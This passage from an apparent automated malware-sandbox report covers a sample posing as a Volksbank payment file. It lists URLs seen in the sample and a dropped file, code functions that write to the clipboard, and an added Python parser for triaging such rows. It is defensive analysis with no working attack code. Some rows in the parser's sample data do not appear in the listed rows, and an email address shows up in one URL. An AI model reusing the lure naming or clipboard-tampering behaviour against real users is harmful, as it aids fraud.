Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=1
Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3004602535.0000000002AC6000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3005040263.0000000002AC6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdres://C:
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/idp?hm=2&emailAddress=shahak.shapira%40outlook.com&_=163230
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://outlookmobile-office365-tas.msedge.net/ab?clientId=512A4435-60B8-42A2-80D3-582B6B7FB6C0&ig=1
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?2787436b358dbd81d7fd0a0cccb05788
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?2f068a709ecd1f0c000b440d901cea9b
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_csp?id=adbundle&qqi=CPuOuO2wkvMCFQDJuwgdDw4EyQ&gqi=
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://pki.goog/repository/0
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://polyfill.io/v3/polyfill.min.js?features=2CElement.prototype.matches%2CElement.prototype.clos
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://px.ads.linkedin.com/setuid?partner=tripleliftdbredirect&tlUid=13122329571212727769&dbredirec
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://rio20prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?ea9fbfdb332f73936cf49a698ddafd8c
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://s.yimg.com/lo/api/res/1.2/7zPvmktG8JzqA0vnWzpk_g--~A/Zmk9Zml0O3c9NjIyO2g9MzY4O2FwcGlkPWdlbWl
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://s1.adform.net/Banners/Elements/Files/2070608/10170131/bvpath_258/pics/footer.png
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://s1.adform.net/Banners/Elements/Files/2070608/10170131/bvpath_258/pics/k2.jpg
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://s1.adform.net/Banners/Elements/Files/2070608/10170131/bvpath_258/pics/k3.jpg
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://s1.adform.net/Banners/Elements/Files/2070608/10170131/bvpath_258/pics/k4.jpg
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://s1.adform.net/banners/scripts/rmb/Adform.DHTML.js?bv=626
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://sectigo.com/CPS0
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3005458183.00000000023A1000.00000004.00000020.00020000.00000000.sdmp, bhvF4C4.tmp.2.drString found in binary or memory: https://servedby.flashtalking.com/imp/8/106228;3700839;201;jsiframe;Adobe;1000x463DESKTOPACROBATREAD
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=4aeddfea844042999a22bdcca1fba378&c=MSN&d=https%3A%2F%2Fwww.ms
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=838b780a64e64b0d92d628632c1c377c&c=MSN&d=https%3A%2F%2Fwww.ms
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=bba24733ba4a487f8f8706bf3811269e&c=MSN&d=https%3A%2F%2Fwww.ms
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-ecst.licdn.com/apc/trans.gif?ae11829b3d6e895a2a3516fac536a339
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-ecst.licdn.com/apc/trans.gif?fa0d4adae7a556f7d0d03112de822178
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jque
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/css/f60532dd-d68e7b58/direct
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-2923b6c2/directi
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-d017f019/directi
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/cfdbd9.png
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAKp8YX.img?h=16&w=16&
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAMqFmF.img?h=16&w=16&
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAODMk8.img?h=75&w=100
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAODQmd.img?h=75&w=100
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAODept.img?h=75&w=100
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOEFck.img?h=75&w=100
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOEQ0I.img?h=368&w=62
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOF4WR.img?h=75&w=100
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOF4Xx.img?h=368&w=62
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFBrV.img?h=75&w=100
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFC5q.img?h=75&w=100
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFCgW.img?h=250&w=30
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFCgW.img?h=75&w=100
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFE0J.img?h=75&w=100
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFENj.img?h=75&w=100
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFJFJ.img?h=75&w=100
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFLk7.img?h=75&w=100
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFWV8.img?h=75&w=100
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFhty.img?h=368&w=62
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFsUC.img?h=250&w=30
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFu51.img?h=75&w=100
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFy7B.img?h=75&w=100
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFyKG.img?h=75&w=100
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOG3Y7.img?h=250&w=30
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOG88s.img?h=75&w=100
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOGPXq.img?h=194&w=30
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOGQtJ.img?h=75&w=100
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOGV90.img?h=194&w=30
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOGapF.img?h=75&w=100
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOGlbE.img?h=75&w=100
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOGmTG.img?h=75&w=100
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOGyYN.img?h=194&w=30
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOH2Ml.img?h=194&w=30
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOH6xB.img?h=75&w=100
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB14hq0P.img?h=368&w=6
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1aXBV1.img?h=27&w=27
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cEP3G.img?h=27&w=27
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cG73h.img?h=27&w=27
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1ftEY0.img?h=16&w=16
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1gEFcn.img?h=16&w=16
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1kc8s.img?m=6&o=true
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7gRE.img?h=16&w=16&m
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7hg4.img?h=16&w=16&m
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuddh.img?h=16&w=16&
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w=27&
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://static-spartan-neu-s-msn-com.akamaized.net/_h/975a7d20/webcore/externalscripts/jquery/jquery
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://static-spartan-neu-s-msn-com.akamaized.net/spartan/en-gb/_ssc/css/b5dff51-e7c3b187/kernel-9c
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://static-spartan-neu-s-msn-com.akamaized.net/spartan/en-gb/_ssc/js/b5dff51-96897e59/kernel-1e4
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://static.doubleclick.net/dynamic/5/283983386/11928812572019506176_2845462151855228713.jpeg
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://static.doubleclick.net/dynamic/5/283983386/2578937774238713912_2802581922324906360.jpeg
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://static.doubleclick.net/dynamic/5/283983386/6852827437855218848_345419970373613283.jpeg
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-bold.wof
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-light.wo
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-regular.
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-semibold
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-semiligh
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3012090570.0000000002B29000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://sync-t1.taboola.com/sg/criteortb-network/1/rtb-h/?taboola_hm=b2df1cf6-0873-4430-916b-9612e80
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://t-ring-fallback.msedge.net/apc/trans.gif?3d88065febcc552cae09e5e8b74c55d5
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://t-ring-fallback.msedge.net/apc/trans.gif?7616d616e1c668bb563496121e660bee
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://t-ring-fallbacks1.msedge.net/apc/trans.gif?706bc421d298bd3a21f8d16839143f35
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://t-ring-fallbacks1.msedge.net/apc/trans.gif?98f4d87f065e77ef17a82286185ce69d
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://t-ring.msedge.net/apc/trans.gif?01af3f8dd36bcb49643452aa096ff6c0
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://t-ring.msedge.net/apc/trans.gif?7de2246f1808e47769e35183d0153a7a
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://tpc.googlesyndication.com/pagead/gadgets/html5/ssrh.js
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://tpc.googlesyndication.com/pagead/gadgets/in_page_full_auto_V1/Responsive_Monte_GpaSingleIfra
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://tpc.googlesyndication.com/pagead/js/r20210916/r20110914/abg_lite.js
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://tpc.googlesyndication.com/pagead/js/r20210916/r20110914/client/qs_click_protection.js
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://tpc.googlesyndication.com/pagead/js/r20210916/r20110914/client/window_focus.js
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://tpc.googlesyndication.com/simgad/14585816484902221120
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://tpc.googlesyndication.com/sodar/sodar2.js
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://tpc.googlesyndication.com/sodar/sodar2/224/runner.html
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://use.typekit.net/af/40207f/0000000000000000000176ff/27/d?subset_id=2&fvd=n3&v=3
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://use.typekit.net/af/cb695f/000000000000000000017701/27/d?subset_id=2&fvd=n4&v=3
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://use.typekit.net/af/eaf09c/000000000000000000017703/27/d?subset_id=2&fvd=n7&v=3
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://use.typekit.net/ecr2zvs.js
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://www.digicert.com/CPS0
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://www.globalsign.com/repository/0
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7810435154.0000000034F10000.00000040.10000000.00040000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000004.00000002.2980976157.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: https://www.google.com
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://www.google.com/
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | String found in binary or memory: https://www.google.com/accounts/servicelogin
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3005458183.00000000023A1000.00000004.00000020.00020000.00000000.sdmp, bhvF4C4.tmp.2.dr | String found in binary or memory: https://www.google.com/chrome/
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3005458183.00000000023A1000.00000004.00000020.00020000.00000000.sdmp, bhvF4C4.tmp.2.dr | String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3008749648.00000000023A9000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3007602786.00000000023A9000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3007682293.00000000023A9000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3008046399.00000000023A9000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3005458183.00000000023A1000.00000004.00000020.00020000.00000000.sdmp, bhvF4C4.tmp.2.dr | String found in binary or memory: https://www.google.com/pagead/drt/ui
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://www.google.com/recaptcha/api2/aframe
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://www.googleadservices.com/pagead/p3p.xml
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://www.googletagservices.com/activeview/js/current/osd.js
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://www.googletagservices.com/activeview/js/current/rx_lidar.js?cache=r20110914
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://www.msn.com
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://www.msn.com/
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3002520130.0000000002AC1000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3001766817.0000000002AC1000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3002030194.00000000023A1000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3005458183.00000000023A1000.00000004.00000020.00020000.00000000.sdmp, bhvF4C4.tmp.2.dr | String found in binary or memory: https://www.msn.com/?ocid=iehp
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/consent/55a804ab-e5c6-4b97-9319-8
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/otBannerSdk
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/otTCF-ie.js
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://www.msn.com/spartan/en-gb/kernel/appcache/cache.appcache?locale=en-GB&market=GB&enableregula
            Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://www.msn.com/spartan/ientp?locale=en-GB&market=GB&enableregulatorypsm=0&enablecpsm=0&NTLogo=1
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 2_2_0041183A OpenClipboard,GetLastError,DeleteFileW
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 2_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 2_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 3_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 3_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard
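Almost every URL in the string list above is attributed by the sandbox to the dropped file bhvF4C4.tmp.2.dr rather than to the sample's own image or memory dumps, so the source column, not the URL itself, is what decides whether a string is worth treating as infrastructure. The text export of the report also fuses the table cells ('.drString found', '2_2_0040987A ... 2_2_0040987A'). The Python below is an added example, not Joe Sandbox code and not part of this report: it parses rows in either the fused or a ' | '-separated form, buckets URL hosts by where they were observed, and pulls out the function ids whose API chains write the clipboard or call native Nt* routines. SAMPLE is copied from the rows above; the category labels 'dropped', 'memory' and 'image', the function names, and the assumption that function addresses are eight hex digits are this example's own.

```python
"""Triage parser for Joe Sandbox 'String found in binary or memory' and
'Code function' rows. Added example for this page, not Joe Sandbox code.
SAMPLE below is copied from the report rows above (constructed input so the
script runs offline); the category labels are this script's own."""
import re
from dataclasses import dataclass, field
from urllib.parse import urlsplit

KINDS = ("String found in binary or memory", "Code function",
         "Static PE information", "Process Stats")
# Fused export ('.drString found') and separated form ('.dr | String found') both match.
ROW_RE = re.compile(r"^\s*Source:\s*(?P<src>.*?)\s*\|?\s*(?P<kind>"
                    + "|".join(map(re.escape, KINDS)) + r"):\s*(?P<body>.*?)\s*$")
# '<proc>_<run>_<8 hex>' followed by the API chain and, in the export, the same id again.
FUNC_RE = re.compile(r"^(?P<fid>\d+_\d+_[0-9A-Fa-f]{8})\s*(?P<apis>.*?)(?:(?P=fid))?$")
SDMP_RE = re.compile(r"^\d{8}\.\d{8}\.\d+\.[0-9A-Fa-f]{16}\..*\.sdmp$")   # memory dump token
DROPPED_RE = re.compile(r"\.\d+\.dr$")                                    # file dropped by process N
NATIVE_RE = re.compile(r"Nt[A-Z]\w*")   # NtProtectVirtualMemory yes, NtdllDefWindowProc_W no


@dataclass
class Finding:
    kind: str
    sources: list            # (name, category) pairs
    body: str
    function_id: str = None
    apis: list = field(default_factory=list)


def split_sources(src):
    """Turn the comma-joined source cell into (name, category) pairs: a
    '<process>, <dump>.sdmp' pair is one memory-dump source, a '.dr' name is
    a file the process wrote, anything else is the sample image itself."""
    tokens = [t.strip() for t in src.split(", ") if t.strip()]
    pairs, i = [], 0
    while i < len(tokens):
        if i + 1 < len(tokens) and SDMP_RE.match(tokens[i + 1]):
            pairs.append((tokens[i], "memory")); i += 2
        elif DROPPED_RE.search(tokens[i]):
            pairs.append((tokens[i], "dropped")); i += 1
        else:
            pairs.append((tokens[i], "image")); i += 1
    return pairs


def parse_row(line):
    """One report row -> Finding, or None for rows of another kind."""
    m = ROW_RE.match(line)
    if not m:
        return None
    f = Finding(m["kind"], split_sources(m["src"]), m["body"])
    if f.kind == "Code function":
        fm = FUNC_RE.match(f.body)
        if fm:   # 'String function: ... appears N times' rows carry no function id
            f.function_id = fm["fid"]
            f.apis = [a for a in fm["apis"].split(",") if a]
    return f


def triage(lines):
    """Bucket URL hosts by where they were seen and list the functions whose
    API chain writes the clipboard or calls native Nt* routines."""
    out = {"hosts_only_in_dropped_files": set(), "hosts_in_sample_memory_or_image": set(),
           "clipboard_writers": [], "native_api_callers": {}, "rows": 0}
    for f in filter(None, map(parse_row, lines)):
        out["rows"] += 1
        if f.kind == KINDS[0]:
            host = urlsplit(f.body).hostname
            if host:
                only_dropped = {c for _, c in f.sources} == {"dropped"}
                out["hosts_only_in_dropped_files" if only_dropped
                    else "hosts_in_sample_memory_or_image"].add(host)
        elif f.function_id:
            if "SetClipboardData" in f.apis:
                out["clipboard_writers"].append(f.function_id)
            native = [a for a in f.apis if NATIVE_RE.fullmatch(a)]
            if native:
                out["native_api_callers"][f.function_id] = native
    return out


SAMPLE = [  # copied from the report rows above, in the fused export form
    r"Source: bhvF4C4.tmp.2.drString found in binary or memory: https://maps.windows.com/windows-app-web-link",
    r"Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7810435154.0000000034F10000.00000040.10000000.00040000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000004.00000002.2980976157.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com",
    r"Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeString found in binary or memory: https://www.google.com/accounts/servicelogin",
    r"Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3005458183.00000000023A1000.00000004.00000020.00020000.00000000.sdmp, bhvF4C4.tmp.2.drString found in binary or memory: https://www.google.com/chrome/",
    r"Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 2_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,2_2_0040987A",
    r"Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 1_2_02D41207 Sleep,NtProtectVirtualMemory,1_2_02D41207",
    r"Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 2_2_00401806 NtdllDefWindowProc_W,2_2_00401806",
    r"Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 2_2_00406E8F2_2_00406E8F",
    r"Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: String function: 004169A7 appears 87 times",
    r"Source: initial sampleStatic PE information: Filename: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe",
]

if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(f"{key}: {value}")
```

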